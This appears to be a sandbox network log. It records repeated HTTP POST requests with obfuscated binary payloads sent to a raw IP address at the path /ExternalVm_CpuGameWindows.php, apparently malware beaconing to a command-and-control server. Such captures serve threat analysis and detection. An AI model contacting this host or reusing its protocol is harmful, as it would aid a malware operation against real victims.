Apr 20, 2024 00:42:30.673126936 CEST	259	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2144 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:30.934751987 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:30.934984922 CEST	2144	OUT	Data Raw: 5a 55 5b 5f 54 5f 58 57 5d 56 5a 59 52 50 56 56 54 56 5c 5d 50 5f 53 5e 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: ZU[_T_XW]VZYRPVVTV\]P_S^W^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$3,!A#9&$#2;#$)*^5!V#!+?3 /:.G#$Z-
Apr 20, 2024 00:42:31.203511000 CEST	349	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 1a 24 12 2a 14 2e 52 21 22 3c 59 2f 12 02 19 28 32 36 1c 3a 0b 2e 06 3d 59 28 59 2a 3e 25 1b 3f 0a 28 59 24 32 23 07 27 12 07 09 2d 10 20 5a 01 11 27 43 24 07 0d 0c 24 1d 08 5a 24 56 32 5f 26 13 39 05 30 06 32 56 3d 12 13 11 33 16 38 11 29 38 3d 0f 28 11 3b 41 25 3c 09 1d 22 24 20 50 0c 10 38 53 29 1c 06 09 26 12 23 50 31 2f 29 56 23 2d 30 53 27 2f 3c 0e 22 24 30 07 3f 0f 3d 04 29 3e 3c 12 23 22 2c 5c 27 0f 23 0e 2b 18 22 5e 2c 0f 20 54 02 3d 5a 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98$.R!"<Y/(26:.=Y(Y>%?(Y$2#'- Z'C$$Z$V2_&902V=38)8=(;A%<"$ P8S)&#P1/)V#-0S'/<"$0?=)><#",\'#+"^, T=ZP0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:30.949116945 CEST	235	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2568 Expect: 100-continue
Apr 20, 2024 00:42:31.210805893 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:31.210951090 CEST	2568	OUT	Data Raw: 5f 57 5b 5b 54 5f 58 53 5d 56 5a 59 52 50 56 5b 54 57 5c 58 50 52 53 53 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: _W[[T_XS]VZYRPV[TW\XPRSSW^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$'/!D4:)S'3#%]3] ((:+Y"?"7"!+?4/7R94.G#$Z-
Apr 20, 2024 00:42:31.481822968 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:33.973138094 CEST	235	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2568 Expect: 100-continue
Apr 20, 2024 00:42:34.231642962 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:34.231827021 CEST	2568	OUT	Data Raw: 5a 56 5b 5e 54 5c 5d 51 5d 56 5a 59 52 50 56 53 54 5c 5c 5e 50 55 53 53 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: ZV[^T\]Q]VZYRPVST\\^PUSSW^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$_0<#)=U$#<%("8$?7X"-V4=?8\4?-.G#$Z-
Apr 20, 2024 00:42:34.498224020 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:34.965663910 CEST	259	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2568 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:35.227514029 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:35.227699995 CEST	2568	OUT	Data Raw: 5a 52 5e 58 54 5c 58 56 5d 56 5a 59 52 5b 56 55 54 51 5c 52 50 56 53 5e 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: ZR^XT\XV]VZYR[VUTQ\RPVS^W^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$$,1B75T'$X&( 47()#_"! 1VY$]!<,:.G#$Z--
Apr 20, 2024 00:42:35.496387959 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:35.870891094 CEST	259	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2568 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:36.130650043 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:36.130975008 CEST	2568	OUT	Data Raw: 5a 57 5e 5f 51 5b 58 54 5d 56 5a 59 52 50 56 54 54 53 5c 5b 50 52 53 5e 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: ZW^_Q[XT]VZYRPVTTS\[PRS^W^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$^'< )U'(^1]4 +<<)'_!271)*8!?#-.G#$Z-
Apr 20, 2024 00:42:36.402276039 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:36.473692894 CEST	259	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2136 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:36.734340906 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:36.734605074 CEST	2136	OUT	Data Raw: 5f 55 5e 59 54 57 58 54 5d 56 5a 59 52 58 56 56 54 55 5c 52 50 51 53 59 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: _U^YTWXT]VZYRXVVTU\RPQSYW^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R'0!B >0V71+78,?:7X627"-=0[7??W-.G#$Z-5
Apr 20, 2024 00:42:36.999762058 CEST	349	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 1a 24 5a 2a 29 26 55 23 32 3b 04 2c 2f 28 53 29 1f 22 11 2d 32 2d 5e 29 59 28 12 29 58 3d 52 2b 23 2b 02 27 0b 2c 5c 33 02 2e 57 39 00 20 5a 01 11 24 1c 27 2a 20 53 24 23 39 06 33 30 26 1c 25 2d 2e 1b 30 2b 26 55 2a 05 21 57 24 28 3b 02 28 28 0c 51 3c 01 0d 07 25 2c 23 52 21 1e 20 50 0c 10 38 53 3d 0b 3f 19 24 2c 06 0f 32 3f 0f 54 21 3d 24 57 26 06 2f 18 35 27 27 14 2b 1f 22 1b 3c 3e 30 13 36 22 28 5a 30 0f 34 11 28 32 22 5e 2c 0f 20 54 02 3d 5a 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98$Z)&U#2;,/(S)"-2-^)Y()X=R+#+',\3.W9 Z$' S$#930&%-.0+&U*!W$(;((Q<%,#R! P8S=?$,2?T!=$W&/5''+"<>06"(Z04(2"^, T=ZP0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:36.646425009 CEST	259	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2568 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:36.908005953 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:36.911935091 CEST	2568	OUT	Data Raw: 5f 50 5b 5b 54 5a 5d 56 5d 56 5a 59 52 5d 56 56 54 54 5c 5f 50 56 53 5a 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: _P[[TZ]V]VZYR]VVTT\_PVSZW^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$$Z-4)U30(]&8+ +;W++_":#>/ ,:.G#$Z-5
Apr 20, 2024 00:42:37.188201904 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:37.613461971 CEST	235	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2564 Expect: 100-continue
Apr 20, 2024 00:42:37.873179913 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:37.873358011 CEST	2564	OUT	Data Raw: 5f 57 5e 5a 54 5f 58 5e 5d 56 5a 59 52 58 56 5b 54 55 5c 59 50 5e 53 52 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: _W^ZT_X^]VZYRXV[TU\YP^SRW^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R''<4%T'(% ^#S)76,!T7:,,\!?7:.G#$Z-
Apr 20, 2024 00:42:38.141088963 CEST	200	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 52 5d 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;R]W0